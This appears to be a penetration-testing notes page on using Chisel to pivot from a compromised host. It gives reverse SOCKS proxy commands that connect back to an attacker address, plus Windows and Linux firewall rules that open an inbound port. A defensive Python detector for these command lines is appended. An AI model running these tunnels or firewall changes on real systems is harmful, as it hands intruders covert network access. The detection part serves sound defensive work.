# Chisel

**Chisel** works in a client-server way, so the chisel binary needs to be on both the attacking machine and the compromised server.

## Reverse SOCKS Proxy

First, we need to set up the **chisel server** on our attacking machine:

```bash
chisel server -p 1335 --reverse &
```

Next, set up the client on the compromised server:

```bash
./chisel client 10.50.102.164:1335 R:socks &
```

* `R:socks`
  * The `R` prefix marks a reverse **remote**. It tells chisel that the server (started with `--reverse`) is waiting for the client to set up a proxy or port forward.

The connection is made on port 1335, but the actual proxy is opened on port **1080** on the attacking machine, so we use **1080** to send traffic through the proxy.

## Remote Port Forward

A remote port forward is when we **connect back** from a compromised target to create the forward.

Start the chisel server on the compromised host (you will also have to open up the firewall port):

```bash
./chisel_windows.exe server -p 15997 --socks5
```

```cmd
netsh advfirewall firewall add rule name="Chisel-Adot8" dir=in action=allow protocol=tcp localport=15997
```

OR

```bash
firewall-cmd --zone=public --add-port 15997/tcp
```

Connect to the chisel server

```bash
chisel client 10.200.101.150:15997 5005:socks
```

{% hint style="info" %}
For a local port forward, it would be exactly the same, except the compromised server becomes the **chisel server** and your attacking machine becomes the **chisel client**.
{% endhint %}
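
From the defender's side, the commands in both sections above leave recognisable process-creation and firewall-change events. The following is an added example, not code from the original page or from the chisel project: it classifies constructed sample command lines by argument shape and reports which side each SOCKS listener opens on. The function names, finding fields and sample events are assumptions made for illustration.

```python
import re
import shlex

# Constructed process-creation command lines modelled on this page's commands.
SAMPLE_EVENTS = [
    "chisel server -p 1335 --reverse",
    "./chisel client 10.50.102.164:1335 R:socks",
    "./chisel_windows.exe server -p 15997 --socks5",
    'netsh advfirewall firewall add rule name="Chisel-Adot8" dir=in action=allow protocol=tcp localport=15997',
    "chisel client 10.200.101.150:15997 5005:socks",
    "python3 manage.py runserver 8000",
]

def classify(cmdline):
    """Heuristic: match on argument shape, not binary name, since the binary may be renamed."""
    args = shlex.split(cmdline)
    if len(args) >= 3 and args[1] == "server" and {"--reverse", "--socks5"} & set(args):
        port = int(args[args.index("-p") + 1]) if "-p" in args[:-1] else None
        return {"kind": "tunnel-server", "port": port}
    if len(args) >= 4 and args[1] == "client" and re.fullmatch(r"[\w.\-]+:\d+", args[2]):
        remotes = []
        for spec in args[3:]:
            reverse = spec.startswith("R:")
            parts = (spec[2:] if reverse else spec).split(":")
            if parts[-1] != "socks":
                continue  # plain port forwards are out of scope for this example
            port = int(parts[-2]) if len(parts) > 1 and parts[-2].isdigit() else 1080
            # A reversed remote listens on the server side, otherwise on the client side.
            remotes.append({"listens_on": "server" if reverse else "client", "socks_port": port})
        if remotes:
            return {"kind": "tunnel-client", "server": args[2], "remotes": remotes}
    m = re.search(r"\bdir=in\b.*\baction=allow\b.*\blocalport=(\d+)", cmdline)
    if "advfirewall" in cmdline and m:
        return {"kind": "firewall-open", "port": int(m.group(1))}
    return None

def findings(events):
    hits = [f for f in map(classify, events) if f]
    served = {f["port"] for f in hits if f["kind"] == "tunnel-server"}
    for f in hits:
        # An inbound allow rule for a port a tunnel server listens on is a stronger signal.
        if f["kind"] == "firewall-open":
            f["matches_tunnel_server"] = f["port"] in served
    return hits

if __name__ == "__main__":
    for hit in findings(SAMPLE_EVENTS):
        print(hit)
```

Matching on the `server`/`client` subcommand and the remote syntax is a heuristic and will need tuning against the process telemetry of a real environment.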
